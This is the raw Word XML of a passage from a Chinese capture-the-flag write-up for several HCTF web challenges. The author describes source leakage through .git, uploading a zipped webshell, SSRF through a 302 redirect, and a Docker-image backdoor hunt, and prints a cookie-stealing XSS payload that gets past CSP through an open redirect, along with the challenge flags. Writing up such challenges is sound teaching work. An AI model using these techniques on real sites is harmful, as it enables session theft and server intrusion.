    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>你喜欢看书吗? 来分享你喜欢的书吧。 （本站资源仅供展示使用，侵删，下载后请于24小时内解决）</w:t>
      </w:r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hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://library.hctf.io/</w:t>
        </w:r>
      </w:hyperlink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</w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:left="420" w:right="178" w:hanging="420"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在后台发现最近很热门的.</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如愿的拿到了源码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>（╯▽╰）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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613A532B" wp14:editId="1595947B">
            <wp:extent cx="2370025" cy="206519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C</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>omm</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中有username加密字段的加解密方法，用register.</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中的逻辑拿到sessionID。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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266DEFD4" wp14:editId="629653E2">
            <wp:extent cx="5274310" cy="130873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集齐两个字段就可以进入manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>了。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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1CE3F6" wp14:editId="3B622C8F">
            <wp:extent cx="5274310" cy="14922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上传压缩后的shell，后台会自动解压，路径也知道，连上菜刀拿到flag。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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc468128542"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>secret area</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>总有一些secret area你还没有发现 只有管理员才是真正掌握flag的人</w:t>
      </w:r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hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://sguestbook.hctf.io/</w:t>
        </w:r>
      </w:hyperlink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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该网站实现的功能为聊天室的功能，网站有csp保护。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞：可以使用重定向`http://sguestbook.hctf.io/static/redirect.php?u=`绕过csp目录限制。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>采取的办法是先在profile处上传含打cookie的js，再使用script标签加载重定向后的js。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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload：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```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&lt;scriscriptpt src=http://sguestbook.hctf.io/static/redirect.php?u=/upload/a9f9852a2516d1ad</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>25cf94ed4c8ed557&gt;&lt;/scrscriptipt&gt;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```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>flag:hctf{4k_w4s_v3ry_afr41d_and_tr3mbl1ng}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc468128543"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>web选手的自我修养</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>新搭的wp居然爆了漏洞，真气，漏洞修复了却被安了后门，你能找到后门在哪吗？？？提供压缩包为docker镜像</w:t>
      </w:r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hyperlink r:id="rId58" w:anchor="%21xcFWXBwb%21XXQCihmJiedqDbNKAaxkKNiBNAqflt9s2hbls71_b7I" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://mega.nz/#!xcFWXBwb!XXQCihmJiedqDbNKAaxkKNiBNAqflt9s2hbls71_b7I</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F9152E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</w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是一个D</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ocker镜像，2.2G。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>出题人</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>知道我们校园网是收流量费的吗</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>QAQ心疼</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>把dockerhome和</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>opcache</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拷出来</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>方便做题。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一下</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hctf{</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>没搜到。</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>做题</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>全靠</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>灵性系列</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。。。搜了</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一下hctf的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>前几位</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>眼前一亮。。。</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ED889EC" wp14:editId="742FE604">
            <wp:extent cx="5274310" cy="7715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C7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C982C00" wp14:editId="24DCE247">
            <wp:extent cx="4953000" cy="10001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C7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解码</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F7AC7" w:rsidRPr="002F7AC7" w:rsidRDefault="002F7AC7" w:rsidP="002F7AC7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2F7AC7">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E19562" wp14:editId="112CB768">
            <wp:extent cx="5274310" cy="3651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C7" w:rsidRPr="00764553" w:rsidRDefault="002F7AC7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</w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc468128544"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t>AT field1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>Welcome to AT field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hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://atfield.hctf.io</w:t>
        </w:r>
      </w:hyperlink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比较</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>简单，给了个</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>302跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后跳到localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获得flag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题目</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>好像挂了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>截不了图</w:t>
      </w:r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</w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc468128545"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t>AT field2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00DA455B" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>Welcome to AT field</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>hint：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>1: 在第一题里不只有flag，还有第二题的入口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>2、扫端口没用，几百线程也没用的呀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>3、我从来没说过，flag1那里没有别的东西啊</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4、安nosql的服务器是centos</w:t>
      </w:r>
    </w:p>
